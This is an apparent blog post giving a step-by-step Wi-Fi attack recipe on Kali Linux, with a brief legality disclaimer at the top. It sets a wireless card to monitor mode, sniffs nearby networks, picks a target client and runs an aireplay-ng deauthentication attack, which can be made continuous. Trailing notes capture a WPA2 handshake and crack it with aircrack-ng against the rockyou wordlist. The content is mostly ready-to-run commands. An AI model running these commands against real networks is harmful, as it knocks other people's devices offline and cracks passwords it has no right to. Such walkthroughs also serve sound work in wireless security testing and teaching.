Rio Weber

Follow

Feb 25, 2017 · 2 min read

Disclaimer: This is illegal if not done on your own network.

Required:
Kali Linux
Wireless Card

START

1. Find your Network Interface card

# iwconfig

This will print out your available network interfaces.
Find the wireless interface (usually says wlan0)

2. Kill All Conflicting Processes

# airmon-ng check kill

3. Enable “Monitor Mode”

# airmon-ng start WIRELESS_INTERFACE

Because Monitor Mode is turned on, you will no longer be able to connect to the internet yourself, but you can now “monitor” everyone else’s internet.

4. Start Monitoring the Traffic

# airodump-ng WIRELESS_INTERFACE_EXTENDED*

• NOTE: the name of your Wireless Interface has probably changed to something like wlan0mon rerun the # iwconfig to see the full name again.

To monitor a specific network: --essid NETWORK_NAME

LIST OF OUTPUTS:

BSSID — the Access Point’s MAC Address
PWR — the signal strength
Beacons — the packets that the router sends out to alert its presence
CH — The channel that information is being broadcast on
AUTH — Either MGT for Managed or PSK for Pre-Shared Key
ESSID — the Access Point’s network name
STATION — the client’s MAC Address
Probe — The list of ESSIDs that the client is looking to connect with

5. Pick Target

6. Get tagets MAC Address

# airodump-ng wlan0mon --bssid BSSID

The MAC Address of the target will be in the “STATION” field.

7. Change to the proper channel

# iwconfig wlan0mon channel CHANNEL

8. Deauth Attack

# aireplay-ng wlan0mon -0 5 -a BSSID -c MAC_ADDRESS -e NETWORK_NAME

5 is how many sets of deauth packets we want to send
-0 0to send it continuously
-3 is used for a deauth injection

./END

wlan.addr==MACADDRESS
Brodcast signals

wlan.ra==MACADDRESS

iwconfig wlan0 channel 11

Wifi WPA2 with rockyou.txt

airodump-ng --channel 1 --write digfor311 wlan0mon

unzip rockyou

gzip -d /usr/share/wordlists/rockyou.txt.gz

Crack Password

aircrack-ng -w /usr/share/wordlists/rockyou.txt digfor311–01.cap

Select network #